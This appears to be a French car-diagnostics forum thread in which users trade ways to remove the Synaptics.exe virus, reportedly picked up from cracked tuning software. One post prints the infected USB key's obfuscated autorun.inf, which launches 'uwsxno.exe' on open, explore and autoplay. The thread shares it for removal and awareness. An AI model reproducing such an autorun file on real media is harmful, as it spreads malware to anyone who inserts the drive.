![]() |
|
Informatique Débats concernant les manipulations des logiciels mais aussi leur développement. |
IMPORTANT MESSAGE FOR OUR USER |
|
![]() |
|
Outils de la discussion |
![]() |
#1 |
Débutant
Pouvoir de réputation: 0 ![]() |
![]()
Bonjour,
Je partage la solution pour ce virus récalcitrant, suivre les étape de la vidéo puis désinstaller et réinstaller les programmes infecté a l origine, fonctionne pour tous les windows. lien de la vidéo : https://www.youtube.com/watch?v=T_dVcFoidHA un thanks en remerciement ![]() |
![]() |
![]() |
The Following User Says Thank You to jamal34 For This Useful Post: | DIAG.ECO.POWER (10/05/2025) |
![]() |
#2 |
Membre accro
![]() Date d'inscription: avril 2023
Thanked 2 018 Times in 934 Posts
Pouvoir de réputation: 24 ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() |
![]()
merci pour les tuto youtube a 2 balles !!!!!!!!!
mais la meilleur solution et de trouver dans quel logiciel il est cacher !!!!!!!!!!!!!!!! |
![]() |
![]() |
![]() |
#3 | |
Débutant
![]() Citation:
si ta une meilleur solution on t'ecoute... |
|
![]() |
![]() |
![]() |
#4 | ||
Membre accro
Pouvoir de réputation: 24 ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() |
![]() Citation:
Citation:
je dis pas le contraire , je n'est pas de meileur solution une fois que tu est infecter la seul chose que je dis , et de trouver la source ! aussi non tu aura bon le dégager ........... il sera toujours la !! |
||
![]() |
![]() |
![]() |
#5 |
Patron de Garage
![]() Date d'inscription: décembre 2011
Thanked 8 058 Times in 3 868 Posts
Pouvoir de réputation: 100 ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() |
![]()
Yes ya mieux
Scan des processus avec handle |
![]() |
![]() |
![]() |
#7 |
Membre habitué T-E
Pouvoir de réputation: 3 ![]() |
![]()
Bonsoir,
La solution, une foisque le virus est trouvée ne serait-ce pas de supprimer le logiciel et d'en remettre un propre ?
![]() |
#8 |
Débutant
![]()
Oui il faut trouver la source mais ce n'est pas suffisant avec ce virus, il faut utilisé synaptics remover et supprimé la clé de démarrage de celui ci de le registre en utilisant ccleaner pour évité qui ce relance (même si la source a était supprimé , ce virus a la particularité de rester dans le démarrage de windows)
ce virus a fait chier pas mal de monde ![]() |
![]() |
![]() |
![]() |
#9 |
Membre habitué T-E
Pouvoir de réputation: 4 ![]() ![]() ![]() ![]() |
![]()
Il vient de winols crack lui ;)
|
![]() |
![]() |
![]() |
#10 | |
Membre accro
![]() Citation:
voila pk j'ai dis ............ et je redis encore , avec se genre de merde , tu crois l'avoir viré , mais 1 mois apres tu lance un exe et hop ........... fuckkkkkk et je me repete encore , le plus et de trouver la source original avec se genre de merde !!! car ca passe d'un exe a l'un , et tu ne sais plus d'ou ca vien ( commencement ) ![]() ![]() ![]() ![]() |
|
![]() |
![]() |
![]() |
#11 |
Membre accro
![]()
ctrl + alt +sup = grestionnaire de tache , ces comme un diag en auto , tu vois le nombre de proc , utilisation cpu /ram etc
la base et de se servire de ceci , et de virée tout les merde inutile ( surtout sur de pc diag ) , si tout les chose inutiles sont desactiver , tout devrais etre a zero !!!!!!!!!!!!!! |
![]() |
![]() |
![]() |
#12 |
Membre accro
![]() Date d'inscription: décembre 2013
Thanked 6 842 Times in 1 192 Posts
Pouvoir de réputation: 82 ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() |
![]() Salam les amis la solution incha ALLAH elle est ici, je l'ai utilisé tous va bien. Synaptics Killer v6
![]() |
#13 |
Membre accro
![]()
une des 1er soluce , si vous avez dl log sur TE , et de signaler les sujet ;)
|
![]() |
![]() |
![]() |
#14 |
Membre attaché
Pouvoir de réputation: 7 ![]() ![]() ![]() |
![]()
slt a tous
je viens juste de l'avoir apparemment il faut désactiver l'execution automatique sur vos disque et cle usb supprimer synaptic.exe dans le registre sur ma cle c’était un petit fichier exécuter avec autorun j'ai utiliser le petit programme usb-set 1.51 pour vacciner les disques et cle si ca peut aider ---------- Post added at 21h35 ---------- Previous post was at 21h32 ---------- le petit code du truc [AutoRun] ;FuqaR VlpvqdNYCLYJwoqHSukwCI fBtAh ;kmlpjVrXwytgFeAmcbubqvpDdNti shELL\OpEN\deFaUlt=1 ;lNywA FfNur ShelL\Open\cOMmanD =uwsxno.exe ;Emwbysyjssg akocv cedmWUrbvbtlqfbiCajnPwS OPen=uwsxno.exe ; sHelL\explOre\commaNd =uwsxno.exe ;opRxen Enxg fPLbHvjmSxhX shElL\AutOplAY\cOmmand=uwsxno.exe pour vous donner l'idee |
![]() |
![]() |
![]() |
#15 | |
Membre accro
![]() Citation:
|
|
![]() |
![]() |
Sponsored Link |
![]() |
Liens sociaux |
Tags |
les, pour, solution, video, virus |
|
|
![]() |
||||
Discussion | Auteur | Forum | Réponses | Dernier message |
Désactivation définitive Start and stop kangoo 3 | mika641pau | Tableau de bord en général | 5 | 12/01/2025 18h04 |
probleme virus sous le nom ( synaptics.exe ) | S-keys | Informatique | 34 | 22/08/2024 01h46 |
patch solution pour raz037 pour moteur K7M | yacine27000 | Renault, Dacia, Nissan | 1 | 22/02/2021 23h54 |
Solution pour réparer ABS bosch pour 307 restylee | justinyours | ABS, ESP, DSC | 11 | 14/01/2016 19h11 |
Cherche solution pour eviter la soudure pour edc 17 | steve | Flasheur de calculateur | 1 | 01/11/2012 21h19 |